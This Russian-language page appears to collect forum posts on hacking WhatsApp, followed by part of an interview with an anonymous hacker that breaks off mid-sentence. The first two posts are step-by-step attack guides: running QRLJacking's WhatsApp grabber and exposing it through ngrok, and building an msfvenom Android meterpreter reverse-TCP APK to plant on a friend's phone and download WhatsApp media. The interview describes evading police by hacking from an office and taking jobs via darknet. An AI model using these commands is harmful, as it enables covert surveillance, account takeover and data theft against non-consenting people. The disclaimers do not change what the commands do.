Search the Community

Для начала устанавливаем последнюю версию geckdriver по ссылке: https://github.com/mozilla/geckodriver/releases После установки вводим следующие команды: mv -f geckodriver /usr/local/share/geckodriver ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver ln -s /usr/local/share/geckodriver /usr/bin/geckodriver Далее клонируем инструмент с репозитория GitHub: git clone https://github.com/OWASP/QRLJacking Переходим в директорию инструмента: cd QRLJacking/QRLJacker Устанавливаем зависимости: python -m pip install -r requirements.txt И запускаем инструмент: python QrlJacker.py Перед нами отроется меню инструмента, где мы создаем ссылку на вредоносный QR-код для кражи WhatsApp: use grabber/whatsapp set set port 1337 run Инструмент сгенерирует ссылку на страницу с вредоносным QR-кодом, ссылку на которую можно получить с помощью команды: jobs Данная ссылка будет работать в локальной сети. Для того, чтобы сделать ее общедоступной, можно воспользоваться ngrok. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

Привет, хакеры! Сегодня я расскажу вам, как вы можете взломать WhatsApp любого своего друга и увидеть все данные его WhatsApp. Мы проделаем весь этот процесс в нашей системе Linux, для чего нам нужно сначала скопировать некоторые команды и создайте полезную нагрузку, которую вы поместите на мобильный телефон вашего друга, а затем вы сможете украсть все данные из телефона цели. Kali Linux - как сделать полезную нагрузку msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk Чтобы создать полезную нагрузку, вам сначала нужно ввести несколько команд, которые показаны в раздели команды и на скринах. В хосте L, вы должны ввести IP-адрес своего машины и в порт L вы можете ввести любой номер порта. После вставки команд ваша полезная нагрузка будет создана, и вы увидите интерфейс, выделенные цифры, размер вашей полезной нагрузки. Теперь нам нужно поместить полезную нагрузку в телефон нашего друга и установить его. После установки полезной нагрузки ее необходимо открыть. Kali Linux - открытие полезной нагрузки. msfconsole После этого, чтобы управлять полезной нагрузкой на вашем компьютере, вы должны открыть инструмент с именем (msfconsole) из который вы можете контролировать свою полезную нагрузку. Когда вы введете имя клана в свой терминал, ваш инструмент запустится. Kali Linux - заполнение информации для полезной нагрузке. use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (YOUR IP) exploit Здесь вы должны ввести IP-адрес вашей машины на хосте L, а затем написать команду эксплойта и нажмите кнопку ввода, и вы увидите, что мой инструмент запущен и готов подключиться к полезной нагрузке. Теперь вы можете видеть, что мой инструмент связан с полезной нагрузкой. Если вы не подключаетесь к полезной нагрузке, вам придется открыть ее еще раз. И тогда перед вами откроется интерфейс. Kali Linux - переходим в мобильную root папку cd / ls -l Здесь вы были подключены к телефону, теперь вам нужно взять данные его WhatsApp из его телефона, для чего сначала нужно зайти в корневые файлы его телефона, команды которые указаны на скрине. Kali Linux – переход в SD-карту. cd sdcard ls -l Придя сюда, вы должны перейти на его SD-карту, где сохранены данные каждого приложения. Перейдя в каталог SD-карты, вы увидите приложения установленные на телефоне. Kali Linux – Переход в папку WhatsApp. cd WhatsApp ls -l Нужно зайти в папку с WhatsApp и взять оттуда данные. cd Media ls -l После входа в WhatsApp перед вами откроются имена файлов и папок, где вам нужно перейдите в папку мультимедиа. После того, как вы зайдете в папку с мультимедиа, перед вами откроются данные WhatsApp вашего друга, теперь вы можете скачать что угодно отсюда. cd WhatsApp \ Images ls -l download (YOUR FILE NAME) После того, как изображение окажется в папке, вы должны написать имя файла, который вы хотите загрузить, после скачать и нажать кнопку ввода, и вы увидите, что мой файл загружен. Тогда вы сможете увидеть то, что хотите. Используя этот метод, вы можете загружать медиа, документы и т.д. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

За последние 10 лет хакеры взломали почти пять миллиардов аккаунтов в соцсетях со всего мира. Данные опубликовал разработчик безопасности Microsoft Трой Хант, и ежедневно он обновляет эту статистику. Зачастую пользователь сам выдает киберпреступнику все данные и даже не догадывается об этом. Есть ли этика у хакеров, зачем в соцсетях лучше молчать и почему "взломать" человека намного проще, чем компьютер, — мы узнали у хакера с 20-летним стажем, который дал интервью на условиях анонимности. Про этику и черных взломщиков Мне не нравится, когда меня называют хакером, потому что это слово несет такой же искусственно сформированный негативный оттенок, как слово "пират". А к нему относят всех — от нарушителей авторских прав, зарабатывающих деньги, до матерей-одиночек, скачивающих обучающие уроки. Сегодня "светлых" хакеров (помогающих искать разработчикам слабые места в программах. — Прим. ред.) больше, чем "черных". Это сложнее, нужна большая квалификация. Да и среди "темных" кибервзломщиков не всех назовешь преступниками. У каждого свой мотив: желание заработать, спортивный интерес или высокие цели. Можно открыть данные, которые, по мнению человека, должны быть обязательно преданы огласке, выложить переписку на WikiLeaks — это не плохо. Если хакер использовал информацию для личного обогащения, отношение к нему у меня негативное. Я скорее этичный хакер. Мне бы хотелось реанимировать RuLeaks — это русскоязычный аналог WikiLeaks. Настоящие профи хакерства — юные 18-летние парни. Они не гонятся за наживой, с детства за компьютером, работают быстрее многих правительственных специалистов. Им нечего терять, у них нет психологических ограничений. Про "собственную шкуру" Благодаря фильмам мы представляем кибервзломщика так: социально неадаптированный человек в капюшоне, с длинными волосами и бородой. Я же с виду не отличаюсь от обычного "офисного планктона". Моя официальная работа не связана с IT. Никогда не занимаюсь хакерством дома — в офисе это делать безопаснее. Домашний интернет я оформляю у провайдера по своим паспортным данным, а компания, где я работаю, все оформляет на себя. Дома я сам открою дверь полиции, которая изымет мое оборудование, а в компании у меня есть время замести следы. Дома я подвергаю опасности всю семью, в компании — только себя. Родные не в курсе моего "хобби". Заказы я беру только через Даркнет, никаких личных встреч или переписок. Про первый опыт — как первый поцелуй Первые знания об IT я получил из книг "Классика Сomputer Science" и журнала "Хакер". Потом появились онлайн-курсы Coursera, курсы американских университетов и "Академии Хана". В школе информатику практически не преподавали. Я рад за современных подростков и завидую — они застали эпоху открытого интернета с неограниченным ресурсом информации. Но мы видим, что эта эпоха заканчивается, глобальную сеть все больше хотят загнать в рамки. До появления безлимитного интернета люди подключались к провайдерам с локальной сетью и файлообменником. Многие пользователи по незнанию открывали доступ к личным папкам, и этим было грех не воспользоваться. Я удаленно подключался к компьютеру человека, открывал "Блокнот" на его рабочем столе и начинал писать инструкцию — "как обезопасить себя от взлома". Человек, может, и был возмущен такой наглостью, но потом мне спасибо говорил. Поэтому мой первый хакерский опыт был весьма этичным. Когда интернет стал доступным, миллионы, в основном подростки, поняли, как круто было бы знать секреты друзей и возлюбленных. Предложения "взломай страничку Светы" мне присылали десятки раз каждый день. За взлом по тем временам давали хорошие деньги. Я этим пользовался. Прошли годы, а такие просьбы до сих пор поступают, но уже от людей 40-50 лет. Не берусь — не интересно. Про человеческую наивность О первом серьезном заказе я не хочу подробно рассказывать из соображений безопасности. Если коротко, то нужно было достать базу данных сотрудников одной компании. Бизнесмены так собирают компромат друг на друга, чтоб